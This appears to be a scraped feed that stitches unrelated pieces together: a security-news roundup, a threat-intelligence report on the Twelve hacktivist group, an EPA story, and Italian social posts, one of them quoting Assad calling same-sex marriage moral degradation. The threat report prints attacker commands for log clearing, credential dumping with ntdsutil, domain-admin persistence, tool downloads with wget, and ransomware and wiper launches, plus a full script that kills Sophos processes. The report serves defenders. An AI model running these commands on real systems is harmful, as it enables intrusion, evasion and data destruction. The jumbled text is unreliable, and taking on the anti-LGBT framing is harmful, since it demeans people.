Before we dive into what was found, you may wonder why open source malware tools exist. First off, trustworthy C2 servers are quite useful for researchers, who need access to such tools for testing. Then there is Red Teaming, where a security professional launches a mock attack against a target to test its defenses. A C2 is often useful for education and hobby level work, and then there are the true criminals that do use these Open Source tools. It takes all types.
A C2 system consists of an agent installed on compromised systems, usually aiming for stealth. These agents connect to a central server, sending information and then executing any instructions given. And finally there’s a client, which is often just a web interface or even a command line interface.
Now what sort of fun is possible in these C2 systems? Up first is Sliver, written in Go, with a retro command line interface. Sliver supports launching Metasploit on compromised hosts. Turns out, it accidentally supported running Metasploit modules against the server’s OS itself, leading to an easy remote shell from an authenticated controller account.
Havoc has a fancy user interface for the clients, and also a command injection flaw. A service name field gets used to generate a shell command, so you’re only a simple escape away from running commands. That’s not quite as useful as the API that failed open when a bad username/password was given. Oops.
Trains!
[Bertin Jose] has a bit of a side hobby, of scanning the Internet for interesting endpoints, with an emphasis on industrial control systems. In an automated scan, a CZAT7 device popped up — a traction power substation controller. This is a miniature power station that supplies power to electric railways. And this one was not only connected to the Internet, it exposed a web interface that probably wasn’t intended to be public. And it included coordinates. It’s delightful that we can point to a picture on Google Maps, to the little building in Poland where this controller lives.
[Bertin] has enough experience with control devices like these, to know that 1111 is a common password. It’s wild that for these devices, both 1111 and 2222 worked for read/write access to the devices. This is where there was clearly a line, where fiddling around further inside these real devices would be ill-advised. What turned out to be more of a problem is finding the right people to disclose the device to. There was never a response, but the device seems to be finally off the Internet.
Raptor Train
We have news this week of a joint effort between Lumen Technologies and the US DoJ to take down the Raptor Train, a botnet that lives on a variety of routers, IoT devices, and cameras and NVRs. This botnet is interesting, that each device was only compromised for an average of 17 days at a time, with the infection only persisting until the next reboot.
What’s always fun about watching malware activity like this is to line up activity with timezones around the world. This one roughly corresponds to a 10:00 AM to 7:00 PM working day in China Standard Time, which checks out with the likely attribution to the Chinese group, Flax Typhoon. The count of total devices was somewhere around 260,000, with exploitation due to a combination of 0-day and n-day vulnerabilities. Turns out maybe it’s not a great idea to put those cameras on the Internet.
Discord and DAVE
Discord has rolled out DAVE, Discord Audio and Video end-to-end Encryption. This new solution will provide encryption for voice and video for DMs, Group DMs, and other live calls on Discord. The solution is Open Source, and was designed in collaboration with trailofbits.
Lots of established cryptography was used, and at a brief look the scheme seems to check out. Notably missing is any mention of quantum-resistant cryptography. That’s not entirely unexpected, as we’re still several years away from practical quantum computers, and the cryptography schemes designed to be immune to quantum cryptography are still quite new and immature.
The Other Side of the Coin
In an interesting counterpoint to Discord’s new scheme, Interpol has taken down Ghost, an end-to-end-encrypted communications platform widely used for organized crime. It seems that Ghost was designed and marketed specifically for criminal use, but one has to ask the question about whether Discord will also face repercussions for the move to strong encryption.
Bits and Bytes
The folks at Cyber Security Associates have the scoop on doing a Patch Diff on a vulnerability fixed in a recent Windows Patch Tuesday. The short explanation is that incoming calls to the driver weren’t checked for whether they originated in the kernel or in userspace.
And finally, there’s a real mystery on the Internet. GreyNoise describes Noise Storms of spoofed packets flooding the Internet. These seem to be malicious, coming in waves since January 2020. The inclusion of the string LOVE in recent packets suggests the name LOVE Storm. GreyNoise has made packet captures available, if any of our readers feel like joining in on the sleuthing to figure out what these packets are up to.
@Informatica (Italy e non Italy 😁) Parte dal Lazio la campagna di sensibilizzazione delle strutture sanitarie sul tema della cybersicurezza attraverso linee guida operative specifiche per la Sanità redatte dall’Agenzia per la Cybersicurezza Nazionale. Il progetto
[quote]Nelle foreste della Louisiana, l’esercito degli Stati Uniti sperimenta l’efficacia di un nuovo tipo di unità istituita sulla base delle lezioni apprese dal conflitto in Ucraina. All’interno del wargame organizzato lo scorso agosto dal Joint Readiness Training Center dell’esercito statunitense, il nuovo plotone di
@Notizie dall'Italia e dal mondo Il nuovo articolo di @valori@poliversity.it Intervista all’economista Mario Pianta sulle molte ombre del piano europeo presentato da Mario Draghi L'articolo «Draghi guarda al passato. Finanziare le imprese non cambia lo sviluppo» proviene da Valori.
@Politica interna, europea e internazionale Litigi violenti, minacce, una presunta gravidanza e patti di riservatezza mai firmati. Un rapporto a dir poco burrascoso, quello tra l’ex ministro della Cultura Gennaro Sangiuliano e l’imprenditrice Maria Rosaria Boccia, stando almeno a quanto riportato nella denuncia
@Informatica (Italy e non Italy 😁) Parte dal Lazio la campagna di sensibilizzazione delle strutture sanitarie sul tema della cybersicurezza attraverso linee guida operative specifiche per la Sanità redatte dall’Agenzia per
In the spring of 2024, posts with real people’s personal data began appearing on the -=TWELVE=- Telegram channel. Soon it was blocked for falling foul of the Telegram terms of service. The group stayed off the radar for several months, but as we investigated a late June 2024 attack, we found that it employed techniques identical to those of Twelve and relied on C2 servers linked to the threat actor. We are therefore confident that the group is still active and will probably soon resurface. This article uses the Unified Kill Chain methodology to analyze the attackers’ actions.
About Twelve
The group was formed in April 2023 in the context of the Russian-Ukrainian conflict and has attacked Russian government organizations ever since.
The threat actor specializes in encrypting and then deleting victims’ data, which seriously complicates efforts to recover the IT environment. This suggests that their main goal is inflicting as much damage as possible. When attacking, the group aims to reach critical infrastructure, but they do not always succeed. In addition, Twelve exfiltrates sensitive information from its victims’ systems and posts it on its Telegram channel.
Interestingly, Twelve shares infrastructure, utilities and techniques (TTPs) with the DARKSTAR ransomware group, formerly known as Shadow or COMET, which suggests that the two belong to the same syndicate or activity cluster. At the same time, whereas Twelve’s actions are clearly hacktivist in nature, DARKSTAR sticks to the classic double extortion pattern. This variation of objectives within the syndicate underscores the complexity and diversity of modern cyberthreats.
Unified Kill Chain: In
The In stage in terms of the Unified Kill Chain refers to the initial phases of a cyberattack aimed at gaining access to the target organization’s LAN. These phases include a range of tactical actions: from external reconnaissance to assuming control of the systems inside the protected network.
Reconnaissance
While we do not know the exact reconnaissance techniques the threat actor uses, we suspect that they scan IP address ranges across Russia based on geotags and try to identify VPN servers and applications accessible from the internet that could be used as entry points into a target organization’s or a contractor’s infrastructure.
Resource Development
As we analyzed the cyberattacks, we found that the threat actor relied exclusively on well-known and freely available tools. The tools frequently used by the group include Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner and PsExec.
Initial Access and Delivery
In most of the attacks we are aware of, the adversary gained initial access to victims’ infrastructure through valid local or domain accounts, VPN or SSH certificates. After gaining access to the victim’s infrastructure, the attackers used the Remote Desktop Protocol (RDP) to move laterally.
Most times, the attackers penetrated the target infrastructure via some of the victim’s contractors. To do this, they gained access to the contractor’s infrastructure and then used its certificate to connect to its customer’s VPN. Having obtained access to that, the adversary can connect to the customer’s systems via the Remote Desktop Protocol (RDP) and then penetrate the customer’s infrastructure.
Exploitation
Web shells
As we analyzed the web servers compromised by the attackers, we discovered a large number of web shells. The paths where these were found looked as follows. /home/bitrix/ext_www/[REDACTED]/assets/images/ /home/bitrix/ext_www/[REDACTED]/bitrix/templates/.default/ajax/images/ /home/bitrix/ext_www/[REDACTED]/bitrix/admin/ All the web shells were written in PHP and bore random names: F6d098f417.php, 3425b29f4e.php, ecb2979be7.php, 04116e895b.php, 7784ba76e2.php, a4daa72a70.php, 5146d22914.php, 001d7a.php, 8759c7.php, 48a08b.php, 6f99ac.php, 82f5f4.php, 0dd37d.php, 6bceb2.php, d0af43.php They could serve various purposes: some executed arbitrary commands, others moved files, and still others, created and sent email. Below are two examples of single-line web shells for moving files.
Examples of web shells for moving files
It is worth noting that most of the web shells used by threat actors are publicly available tools that can be found in publicly available sources. Here are two examples:
We use the example of a remailer (script for sending email) to examine how the web shells function.
Example of a remailer script used by the threat actor
The attackers used this PHP script to send email messages. It starts by checking for requisite data, such as the recipient’s address, subject and message body inside a POST request. If any of the key data is missing, the script reports an error and quits. After successfully checking and preparing email components, it uses the PHP mail() function to send the email.
FaceFish backdoor
An incident we investigated involved the FaceFish backdoor, loaded with the help of a web shell installed on a VMware vCenter server by exploiting the CVE-2021-21972 and CVE-2021-22005 vulnerabilities in the vSphere virtualization platform. The former vulnerability can be found in the platform’s client and allows remote code execution, while the latter is an arbitrary file upload vulnerability in the server.
Like most of the web shells used by the group, this one is publicly available. https://github[.]com/NS-Sp4ce/CVE-2021-21972/tree/main/payload/Linux It was located at the following path in the infected system: /usr/lib/vmware-vsphere-ui/server/static/resources/libs/shell.jsp Once started, FaceFish saves a libs.so shared library in the system, injects it into the sshd process with the ld.so.preload method and restarts the SSH service.
Example of FaceFish output
Persistence
To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (Access Control Lists) for Active Directory objects. Below is a list of the PowerShell commands they ran. Add-DomainGroupMember -Identity [REDACTED] -Members 'EXCHANGE WINDOWS PERMISSIONS' Add-DomainGroupMember -Identity [REDACTED] -Members 'Organization Management' Add-DomainGroupMember -Identity [REDACTED] -Members "EXCHANGE WINDOWS PERMISSIONS" Add-DomainObjectAcl -Rights 'All' -TargetIdentity "users" -PrincipalIdentity "engineers" Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "users" Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "userasdasdasds" Set-DomainObject -Credential $Cred -Identity [REDACTED]-SET @{serviceprincipalname='nonexistent/BLAHBLAH'} The attackers also added domain accounts and user groups with the net.exe system utility. net user [REDACTED] engineers /domain /add net group [REDACTED] engineers /domain /add net group engineers [REDACTED] /domain /add net group engineers 'EXCHANGE WINDOWS PERMISSIONS' /add /domain net group 'engineers' 'EXCHANGE WINDOWS PERMISSIONS' /add /domain net group engineers /domain net group users /domain net group "Domain Administrators" [REDACTED] /add /domain Furthermore, they tried distributing and running malware through the task scheduler and modified group policies to save malicious tasks for the entire domain.
Defense Evasion
To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services. C:\Windows\System32\Tasks\run C:\Windows\System32\Tasks\Update Microsoft C:\Windows\System32\Tasks\Yandex C:\Windows\System32\Tasks\YandexUpdate C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe They also used a range of techniques to hide the traces of their activity. In particular, they cleared event logs with the wevtutil.exe system utility in various command shell variants. powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}
C:\Windows\system32\cmd.EXE" /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1 In addition, the attackers used a script that cleared the RDP connection history to remove the traces of their RDP usage, recent documents and list of executed files. @echo off reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" attrib -s -h %userprofile%\documents\Default.rdp del %userprofile%\documents\Default.rdp del /f /s /q /a %AppData%\Microsoft\Windows\Recent\AutomaticDestinations reg delete "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU" /va /f
Command and Control
In one of the group’s attacks, we discovered traces of the Cobalt Strike framework, which the attackers used to contact their C2 and distribute malicious payloads. We found the tool at the following path: \users\{username}\pictures\photos_delo\loop.exe The adversary also used the curl and wget system utilities to deliver various tools to compromised hosts. wget https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 curl https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Unified Kill Chain: Through
The Through stage in terms of the Unified Cyber Kill Chain refers to adversary actions within a previously compromised target network aimed at gaining access to further systems and data that the attacker needs to achieve their goals. This stage involves a series of steps designed to propagate across the network and access critical assets.
Pivoting
The adversary used ngrok to tunnel traffic. They installed that utility immediately after connecting to the system, and set port 3389 (standard RDP port) in the configuration file. After that, all illegitimate connections to the system via RDP were made through ngrok. The attackers attached the utility to a service named “svchost” with the following command: C:\ProgramData\svchost\svchost.exe service run --config C:\ProgramData\svchost\svchost.yml
C:\ProgramData\svchost\ was a directory created by the attackers. The svchost.exe file is ngrok itself, while svchost.yml serves as its configuration file. In addition to the port number, it contains an authorization token, which looks as follows: 2YXVHSiK9hhc4aKCbH4i6BLh21J_6zwxt**********. Tokens differ between samples.
The ::::%16777216 value in the Source Network Address field, in the RDP event log indicates that the attackers initiated their connections via ngrok.
Discovery
The adversary used Advanced IP Scanner, BloodHound and adPEAS to reconnoiter the LAN and domain infrastructure, and to investigate the relationships between domains. Advanced IP Scanner can quickly identify all devices on a given network. BloodHound is used to analyze and visualize users and systems the domain trusts, and to identify paths of least resistance for privilege escalation. adPEAS is used to attack Active Directory, detect configuration flaws and identify ways to escalate domain privileges. Combined, these tools allow attackers to effectively probe and exploit victims’ LANs.
In addition, the group used PowerView module cmdlets to discover domain user accounts. Get-DomainObject users Get-ADUsers users Get-ADUser users Get-ADUser -Filter * -SearchBase "[REDACTED OU]" Get-ADUser -Filter * -SearchBase "[REDACTED OU]" | findstr Name The group used PowerShell to gain domain groups data. Get-ADGroup Get-ADGroup "EXCHANGE WINDOWS PERMISSIONS" Get-ADGroupMember "EXCHANGE WINDOWS PERMISSIONS" Get-ADGroupMember "engineers" Get-DomainGroupMember engineers Get-DomainGroupMember skzi
Privilege Escalation
To escalate privileges, the adversary primarily used the legitimate credentials of users with administrative access privileges.
In addition, they used the PowerView module to modify the attributes of new accounts they set up to achieve their goals: Add-DomainObjectAcl -Rights 'All' The -Rights ‘All’ parameter grants the account full access to the specified object. This may include permission to read, write, create, delete and perform various operations on the object.
Example of permissions granted with PowerView to an account of interest to the attackers
Execution
Scripts and commands
The adversary used system interpreters and publicly available tools, as well as self-written .bat and PowerShell scripts, to perform various actions in the system.
Below are some examples of attack scripts we discovered: gpo.ps1 Sophos_kill_local.ps1 Logon.bat CleanRDPHistory.bat c:\intel\GPO.bat \\netlogon\logon.bat c:\intel\test.ps1 \\netlogon\u.bat \SYSVOL\domain\scripts\outlookconf2003.ps1 The list of commands run by the adversary as recorded in the PowerShell log indicates that they started active PowerShell sessions on the hosts they attacked, and also gives one an idea of the operator’s level of competence.
See below for a list of commands that the attackers executed in an attempt to import the PowerView module. impot .\PowerView.ps1 import .\PowerView.ps1 Import-Module .\PowerView.ps1 cd C:\Users\Public\Documents Import-Module .\PowerView.ps1 Set-ExecutionPolicy bypass Import-Module .\PowerView.ps1
Sophos_kill_local.ps1
A script we detected attempts to terminate Sophos processes on the computer and writes the results to local and remote log files. $LogTime = Get-Date -Format "MM-dd-yyyy_hh-mm-ss" $path = "C:\Program Files (x86)\Sophos\Logs\" $pcname = $env:computername $Processes = Get-WmiObject -Class Win32_Process -ComputerName $env:computername -Filter "ExecutablePath LIKE '%Sophos%'" foreach ($process in $processes) { $ProcessName = $process.name $returnval = $process.terminate() $processid = $process.handle if($returnval.returnvalue -eq 0) { $LogFile1 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Success-Terminated"+".txt" $LogFile11 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Success-Terminated"+".txt" "The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile1 -Append -Force "The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile11 -Append -Force } else { $LogFile2 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Sophos Not-Terminated"+".txt" $LogFile22 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Sophos Not-Terminated"+".txt" "The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile2 -Append -Force "The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile22 -Append -Force } }
Using the Task Scheduler
To perform all the ultimate destructive actions, such as starting the ransomware and wipers, the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time.
Running a PowerShell script that modifies group policies
YandexUpdate
\\[DOMAIN]\netlogon\12.exe -pass **************
Running the ransomware from the netlogon network share and passing a password as an argument
Update Microsoft
C:\ProgramData\intel.exe
Launching a wiper
Credential Access
The adversary used mimikatz to obtain user credentials. They saved the utility file under the name calculator.exe to disguise its real purpose. However, they did not bother to change the utility’s default icon. The attackers used mimikatz to set up a dump of local credentials from the memory of the lsass.exe process.
Screenshot of calculator.exe running
We found artifacts indicating that mimikatz was used on compromised hosts, both in the form of an executable file and a PowerShell script. C:\Users\[User]\Desktop\x64\mimikatz.exe C:\Users\[User]\Desktop\CrackMapExecWin_v2.2\hosted\Invoke-Mimikatz.ps1 C:\[Redacted]\x64\mimidrv.sys In addition to dumping lsass.exe with mimikatz, the adversary obtained local credentials by dumping the SYSTEM, SAM and SECURITY registry branches with the reg.exe system utility and saved these to the Downloads folder for subsequent archiving and exfiltration. C:\Users\[USER]\Downloads\SYSTEM C:\Users\[USER]\Downloads\SAM C:\Users\[USER]\Downloads\SECURITY The attackers also tried to gain access to domain credentials. To do this, they used the ntdsutil.exe system utility to dump ntds.dit.
The command that dumps ntds.dit is shown below: $system32\ntdsutil.exe",""$system32\ntdsutil.exe" "ac i ntds" ifm "create full c:\temp" q q To extract additional credentials from the system, the attackers then used the console version of XenArmor’s All-In-One Password Recovery Pro utility, which can extract most of a user’s credentials from registry hives.
The command to collect data with All-In-One Password Recovery Pro is shown below: c:\programdata\update\xenallpasswordpro.exe" -a "c:\programdata\update\report.html" In the screenshot below, you can see an example of running this utility with the parameters that the attackers used, and a list of data that it collects when configured like that.
Lateral Movement
To move within the victim’s infrastructure, the adversary used local and domain credentials obtained in earlier phases of the attack.
In most cases, they connected to new devices on the victim’s network via the Remote Desktop Protocol (RDP) by using the mstsc.exe executable file. They would occasionally use PsExec to move across the network via SMB and use the Enter-PSSession command to start an interactive session with remote computers on the network, a PowerShell feature for managing and running commands on remote systems with the help of PowerShell Remoting. Enter-PSSession -ComputerName [COMPUTER 1] Enter-PSSession -ComputerName [COMPUTER 2] Enter-PSSession -ComputerName [COMPUTER 3] Enter-PSSession sets up a temporary interactive session between the local and remote systems, allowing the adversary to run PowerShell commands directly on remote machines as if running them locally. The communication process typically uses the WS-Management protocol running on top of HTTP or HTTPS.
Unified Kill Chain: Out
The Exit stage in terms of the Unified Kill Chain describes the adversary’s concluding actions after successfully infiltrating the target network and gaining access to all systems and data they are looking to access. This stage focuses on achieving the ultimate goals of the attack, which may include data theft, sabotage or other actions that compromise the confidentiality, integrity and availability (CIA) of the victim’s information assets.
Collection
The adversary collected substantial amounts of sensitive information about their victims: financial documents, technical drawings, corporate email, and so on. They used 7z to archive data they collected and forwarded the data via cloud sharing services.
Also during their attacks, the adversary archived and exfiltrated the Telegram data folder (tdata). C:\Users\[User]\AppData\Roaming\Telegram Desktop\tdata\tdata.7z This folder contains cached media files (images, videos, audio), messages, stickers and documents the user has sent or received via Telegram. The data can be used for quick access without having to download files again from the servers. The tdata folder also contains session files that allow the application to automatically connect to the account without the user having to reenter their login and password.
An adversary who gains access to the folder can extract private messages, media files and documents, which results in the leakage of sensitive personal or commercial information. The adversary can leverage session files and encryption keys to bypass authentication when signing in to a Telegram account, to read chats and to impersonate the victim when sending messages.
Exfiltration
The adversary uploaded archives containing data they were interested in to dropmefiles.net/ via a browser. We learned that DropMeFiles was the file sharing service they used when we found a page header that read, “Завантаження вдалося! – dropmefiles.net” (“Upload successful!” – dropmefiles.net) in the browser cache in the aftermath of an attack.
Impact
Ransomware
The attackers used a version of the popular LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt the data.
Kaspersky Threat Attribution Engine attribution
We detected ransomware files at the following paths:
\ProgramData\;
\\netlogon\.
The following file names featured in known incidents involving LockBit 3.0 ransomware.
twelve.exe;
1.exe;
12.exe;
enc.exe;
betta.exe;
sed.exe;
svo.exe.
Below is a detonation graph for the ransomware, built by Kaspersky Cloud Sandbox. It displays file execution and suspicious events that occur in the process. As you can see from the graph, the ransomware is quite noisy and generates a lot of events that give away its activity.
Detonation graph for the ransomware used by Twelve
As previously mentioned under Execution, the ransomware leverages group policies to spread across its victims’ infrastructures. The attackers used PowerShell to move the ransomware file to the netlogon network share and then ran a script to modify group policies. powershell.exe -ex bypass -f C:\Users\Public\gpo.ps1 After updating the policies, they set up scheduled tasks on all domain computers to copy and run the ransomware.
First, the ransomware was moved from the netlogon network share to the local ProgramData directory by the Copywiper task as follows: powershell.exe Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData` After this, they started the ransomware from a local folder or network share via the CLI, specifying a unique password as the -pass argument: cmd.exe` /c c:\programdata\twelve.exe -pass ************
Adversary action pattern
The ransomware algorithm depends on the built-in configuration file. The table below shows the configuration of the Trojan in question, identical across all samples we found.
Parameter
Meaning
Description
encrypt_mode
auto
Set encryption mode for large files. This takes one of two values: “auto” or “fast”.
encrypt_filename
TRUE
Encrypt file name
impersonation
FALSE
Use accounts listed in configuration file to escalate privileges
skip_hidden_folders
FALSE
Skip hidden directories
language_check
FALSE
Check system locale
local_disks
TRUE
Encrypt local drives
network_shares
TRUE
Encrypt network directories
kill_processes
TRUE
Terminate processes
kill_services
TRUE
Stop services
running_one
TRUE
Verify that only one ransomware process is running
print_note
FALSE
Print out ransom demand
set_wallpaper
FALSE
Change desktop wallpaper
set_icons
FALSE
Change icons of encrypted files
send_report
FALSE
Send system information to C2
self_destruct
TRUE
Remove itself when done
kill_defender
TRUE
Stop Windows Defender
wipe_freespace
FALSE
Fill all available disk space with temporary file containing random data
psexec_netspread
FALSE
Spread across network via PsExec service
gpo_netspread
FALSE
Spread across network via group policies
gpo_ps_update
TRUE
Use PowerShell to update group policies across all domains
shutdown_system
FALSE
Restart system
delete_eventlogs
TRUE
Clear system logs
delete_gpo_delay
0
Deferred removal of group policy. The value in this parameter describes the time to delay deletion by.
The configuration file also contains a list of directories where encryption should be skipped.
$recycle.bin
boot
Tor browser
config.msi
program files
windows.old
$windows.~bt
program files (x86)
intel
$windows.~ws
programdata
msocache
windows
system volume information
perflogs
x64dbg
public
all users
default
Microsoft
It also contains a list of specific files that should not be encrypted.
autorun.in
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
d3d9caps.dat
GDIPFONTCACHEV1.DAT
Finally, the ransomware does not encrypt files with the following name extensions:
386
adv
ani
bat
bin
cab
cmd
com
cpl
cur
deskthemepack
diagcab
diagcfg
diagpkg
dll
drv
exe
hlp
icl
icns
ico
ics
idx
lnk
mod
mpa
msc
msp
msstyles
msu
nls
nomedia
ocx
prf
ps1
rom
rtp
scr
shs
spl
sys
theme
themepack
wpx
lock
key
hta
msi
pdb
search-ms
Before starting work, the ransomware terminates processes that may interfere with the encryption of individual files. The names of processes to be terminated are listed below.
sql
oracle
ocssd
dbsnmp
synctime
agntsvc
isqlplussvc
xfssvccon
mydesktopservice
ocautoupds
encsvc
firefox
tbirdconfig
mydesktopqos
ocomm
dbeng50
sqbcoreservice
excel
infopath
msaccess
mspub
onenote
outlook
powerpnt
steam
thebat
thunderbird
visio
winword
wordpad
notepad
calc
wuauclt
onedrive
The ransomware also terminates the following services:
vss
sql
svc$
memtas
mepocs
msexchange
veeam
backup
GxVss
GxBlr
GxFWD
GxCVD
kavfs
AVP
avpsus
Interestingly, the configuration for creating a ransom note lacks any contacts or ways of reaching out to the attackers. The final note consists of just the group logo.
We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files. We discovered samples of that ransomware at the following paths:
As you can see from the screenshot below, the Kaspersky Threat Attribution Engine detects that one of these samples bears 60% similarity to Chaos.
Result of the Kaspersky Threat Attribution Engine file attribution
At the time we discovered the samples, it was unclear who was behind the incidents in which they were used. However, static analysis showed that the code contained characteristic lines linking the samples to the Twelve group.
Result of the static analysis of Chaos-based ransomware
Wipers
In addition to the ransomware, the adversary used wipers to destroy their victims’ infrastructures. They typically ran the wipers after encrypting files.
The wiper file we found had been compiled from publicly available source code. The wiper rewrites the master boot record (MBR) on connected drives so when the victim next turns on the device, the “From Iran with love – Shamoon” message appears on the screen, and the operating system will not load.
String written to the MBR
The file then recursively goes through each directory, except for Windows and System Volume Information, on all mounted drives, and does the following for each file:
Overwrite the file contents with randomly generated bytes;
Overwrite file metadata: reset size and set random created/modified/opened dates;
Assign a random name to the file and delete it.
When done, the malicious file deletes itself and shuts down the system.
As we conducted our dynamic and static analyses, we concluded that the wiper version was identical to the publicly available one.
Wiper detonation graph in Kaspersky Cloud SandBox
Result of the wiper static analysis
Also while researching the attacks by Twelve, we discovered another version of the wiper. The sample was identical to Shamoon, except for a number of specifically renamed functions.
Renamed Shamoon-based wiper features
While investigating attacks by the group, we found wiper files at the following paths:
\Desktop\;
\ProgramData\;
\\netlogon\.
The following file names have featured in known incidents involving the wiper:
intel.exe;
mail.exe;
wiper.exe.
The wiper’s spread pattern across a victim’s infrastructure is almost no different from that of the ransomware. The adversary uses PowerShell to copy the wiper file to the netlogon network share and then runs a script that modifies group policies and creates scheduled tasks. powershell -ex bypass -f \\[DOMAIN]\netlogon\outlookconf2003.ps1 The wiper file is then copied from the netlogon network share to the local ProgramData folder on all previously encrypted domain computers. powershell.exe` Copy-Item `\\[DOMAIN]\netlogon\intel.exe` -Destination `C:\ProgramData After this, a scheduled task starts and runs the wiper file, which destroys data on the device. C:\ProgramData\intel.exe
Wiper spread pattern in the victim’s infrastructure
Objectives
The threat actor’s strategic goals:
Destroy critical infrastructure and disrupt business;
Steal sensitive data;
Discredit victims by reporting the compromise on the attackers’ Telegram channel.
Takeaways
Twelve is mainly driven by hacktivism rather than financial gain. This shows in their modus operandi: rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims’ data and then destroy their infrastructure with a wiper to prevent recovery. The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit.
Our analysis also shows that the group sticks to a publicly available and familiar arsenal of malware tools, which suggests it makes none of its own. This makes it possible to detect and prevent Twelve’s attacks in due time. Failure to do so could result in the organization’s infrastructure sustaining significant damage from the threat actor.
@Notizie dall'Italia e dal mondo In Svezia il governo ha deciso di aumentare il budget della Difesa per sostenere il rafforzamento del fronte nord della Nato L'articolo La Svezia aumenta le spese militari del 10% proviene da Pagine Esteri.
Recently, the EPA and COBB Tuning have settled after the latter was sued for providing emissions control defeating equipment. As per the EPA’s settlement details document, COBB Tuning have since 2015 provided customers with the means to disable certain emission controls in cars, in addition to selling aftermarket exhaust pipes with insufficient catalytic systems. As part of the settlement, COBB Tuning will have to destroy any remaining device, delete any such features from its custom tuning software and otherwise take measures to fully comply with the Clean Air Act, in addition to paying a $2,914,000 civil fine.
The tuning of cars has come a long way from the 1960s when tweaking the carburetor air-fuel ratios was the way to get more power. These days cars not only have multiple layers of computers and sensor systems that constantly monitor and tweak the car’s systems, they also have a myriad of emission controls, ranging from permissible air-fuel ratios to catalytic converters. It’s little surprise that these systems can significantly impact the raw performance one might extract from a car’s engine, but if the exhaust of nitrogen-oxides and other pollutants is to be kept within legal limits, simply deleting these limits is not a permissible option.
COBB Tuning proclaimed that they weren’t aware of these issues, and that they never marketed these features as ’emission controls defeating’. They were however aware of issues regarding their products, which is why they announced ‘Project Green Speed’ in 2022, which supposedly would have brought COBB into compliance. Now it would seem that the EPA did find fault despite this, and COBB was forced to making adjustments.
Although perhaps not as egregious as modifying diesel trucks to ‘roll coal’, federal law has made it abundantly clear that if you really want to have fun tweaking and tuning your car without pesky environmental laws getting in the way, you could consider switching to electric drivetrains, even if they’re mind-numbingly easy to make performant compared to internal combustion engines.
@Notizie dall'Italia e dal mondo Nelle tasche il poco denaro è distrutto, in ospedali e scuole improvvisate mancano fogli su cui scrivere. Si fa di necessità virtù. Ma non basta: la crisi economica nei nuovi dati dell’Onu pagineesteri.it/2024/09/20/med…
@Notizie dall'Italia e dal mondo Il nuovo articolo di @valori@poliversity.it Un report dice che i progetti che rilasciano carbon credits non contribuiscono alla crescita economica dei Paesi in cui sono situati L'articolo Non è vero che i carbon credits arricchiscono i Paesi poveri proviene da Valori.
L’approfondimento con i primi dati relativi alle scuole statali nell’anno scolastico 2024/2025 è online.
Nell’anno appena iniziato sono tornati sui banchi 7.073.587 studenti, distribuiti in 362.115 classi.
Qui tutti i dettagli ▶️ https://www.miur.
Quando si pubblicano immagini sui social network, è importante inserire il testo alternativo. Questo infatti può aiutare le persone con disabilità visive a comprendere il contenuto delle immagini attraverso l'uso di screen reader e dimostra un impegno verso l'inclusività, rendendo i tuoi contenuti accessibili a un pubblico più ampio. Inoltre può fornire un contesto aggiuntivo per gli utenti che potrebbero avere problemi a caricare le immagini a causa di una connessione internet lenta.
Friendica offre la possibilità di aggiungere il testo alternativo, ma può essere un po' complicato aggiungerlo quando si utilizza il browser.
Infatti, quando si aggiunge un'immagine in Friendica noi vedremo il codice dell'incorporamento dell'immagine, che risulterà più o meno così:
[url=https://poliverso.org/photo/1997546105611028f975883153721557-0.jpeg][img=https://poliverso.org/photo/1997546105611028f975883153721557-1.jpeg]Lo stercorario trascina una palla di sterco: nella simbologia egizia rappresentava l'amministratore di un'istanza pubblica del Fediverso[/img][/url]
Ch diventa:
.
Facile, no? Ok... non è facile per niente. Ma ormai lo abbiamo capito: Friendica è davvero un software molto potente, ma -a discapito del nome- non è affatto amichevole! 🤣
[quote]L’Ucraina, l’Afghanistan, lo stato dei rapporti transatlantici e il futuro della sicurezza collettiva. In una delle sue ultime apparizioni pubbliche in qualità di Segretario generale della Nato, Jens Stoltenberg ha partecipato a un evento ospitato dal German marshall fund per discutere dei profondi
Bashar al-Assad parla in dettaglio del neoliberismo e delle sue manifestazioni:
Il neoliberismo si basa sulla promozione del degrado morale totale, sulla separazione degli individui da qualsiasi principio, valore, affiliazione [a una nazione e religione] e credenza.
Il neoliberismo ha promosso il matrimonio tra persone dello stesso sesso, è iniziato negli anni ’70 ed è ora legale [in Occidente]. Ora stanno già avendo figli. Un'altra domanda è: come fanno ad avere figli?
